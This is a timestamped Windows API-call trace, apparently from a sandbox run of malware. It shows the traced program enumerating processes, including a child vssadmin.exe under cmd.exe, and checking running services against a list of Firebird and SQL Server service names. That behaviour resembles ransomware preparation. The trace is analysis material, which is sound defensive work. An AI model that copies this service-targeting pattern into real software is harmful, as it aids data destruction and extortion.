	[0037.029] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0037.029] lstrlenW (lpString="trips.exe") returned 9
	[0037.029] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0037.030] lstrlenW (lpString="tumormanual.exe") returned 15
	[0037.030] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0037.030] lstrlenW (lpString="telecom.exe") returned 11
	[0037.030] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0037.031] lstrlenW (lpString="realistic.exe") returned 13
	[0037.031] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0037.031] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0037.031] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0037.032] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0037.032] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0037.032] lstrlenW (lpString="cmd.exe") returned 7
	[0037.032] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0037.033] lstrlenW (lpString="conhost.exe") returned 11
	[0037.033] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0037.033] lstrlenW (lpString="vssadmin.exe") returned 12
	[0037.033] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0037.033] CloseHandle (hObject=0x1bc) returned 1
	[0037.033] Sleep (dwMilliseconds=0x1f4) 
	[0037.623] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fa18
	[0037.623] EnumServicesStatusExW (in: hSCManager=0x7e0fa18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0037.624] GetLastError () returned 0xea
	[0037.624] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x123e) returned 0x7e5ca88
	[0037.624] EnumServicesStatusExW (in: hSCManager=0x7e0fa18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x123e, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0037.624] CloseServiceHandle (hSCObject=0x7e0fa18) returned 1
	[0037.625] lstrlenW (lpString="Appinfo") returned 7
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0037.625] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0037.625] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0037.625] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0037.625] lstrlenW (lpString="AudioSrv") returned 8
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0037.625] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0037.625] lstrlenW (lpString="BFE") returned 3
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0037.625] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0037.625] lstrlenW (lpString="CryptSvc") returned 8
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0037.625] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0037.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0037.625] lstrlenW (lpString="CscService") returned 10
	[0037.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0037.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0037.626] lstrlenW (lpString="DcomLaunch") returned 10
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0037.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0037.626] lstrlenW (lpString="Dhcp") returned 4
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0037.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0037.626] lstrlenW (lpString="Dnscache") returned 8
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0037.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0037.626] lstrlenW (lpString="DPS") returned 3
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0037.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0037.626] lstrlenW (lpString="eventlog") returned 8
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0037.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0037.626] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0037.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0037.626] lstrlenW (lpString="EventSystem") returned 11
	[0037.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0037.627] lstrlenW (lpString="gpsvc") returned 5
	[0037.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0037.627] lstrlenW (lpString="iphlpsvc") returned 8
	[0037.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0037.627] lstrlenW (lpString="LanmanServer") returned 12
	[0037.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0037.627] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0037.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0037.627] lstrlenW (lpString="lmhosts") returned 7
	[0037.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0037.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0037.627] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0037.627] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0037.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0037.628] lstrlenW (lpString="MMCSS") returned 5
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0037.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0037.628] lstrlenW (lpString="MpsSvc") returned 6
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0037.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0037.628] lstrlenW (lpString="Netman") returned 6
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0037.628] lstrlenW (lpString="netprofm") returned 8
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0037.628] lstrlenW (lpString="NlaSvc") returned 6
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0037.628] lstrlenW (lpString="nsi") returned 3
	[0037.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0037.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0037.628] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0037.628] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0037.629] lstrlenW (lpString="PcaSvc") returned 6
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0037.629] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0037.629] lstrlenW (lpString="PlugPlay") returned 8
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0037.629] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0037.629] lstrlenW (lpString="Power") returned 5
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0037.629] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0037.629] lstrlenW (lpString="ProfSvc") returned 7
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0037.629] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0037.629] lstrlenW (lpString="RpcEptMapper") returned 12
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0037.629] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0037.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0037.629] lstrlenW (lpString="RpcSs") returned 5
	[0037.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0037.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0037.630] lstrlenW (lpString="SamSs") returned 5
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0037.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0037.630] lstrlenW (lpString="Schedule") returned 8
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0037.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0037.630] lstrlenW (lpString="SENS") returned 4
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0037.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0037.630] lstrlenW (lpString="ShellHWDetection") returned 16
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0037.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0037.630] lstrlenW (lpString="Spooler") returned 7
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0037.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0037.630] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0037.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0037.630] lstrlenW (lpString="SysMain") returned 7
	[0037.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0037.631] lstrlenW (lpString="Themes") returned 6
	[0037.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0037.631] lstrlenW (lpString="TrkWks") returned 6
	[0037.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0037.631] lstrlenW (lpString="UxSms") returned 5
	[0037.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0037.631] lstrlenW (lpString="VSS") returned 3
	[0037.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0037.631] lstrlenW (lpString="WdiServiceHost") returned 14
	[0037.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0037.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0037.631] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0037.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0037.631] lstrlenW (lpString="WdiSystemHost") returned 13
	[0037.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0037.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0037.632] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0037.632] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0037.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.632] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.632] lstrlenW (lpString="Winmgmt") returned 7
	[0037.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0037.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0037.632] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0037.632] lstrlenW (lpString="WPDBusEnum") returned 10
	[0037.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0037.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0037.632] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0037.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0037.632] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0037.632] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc
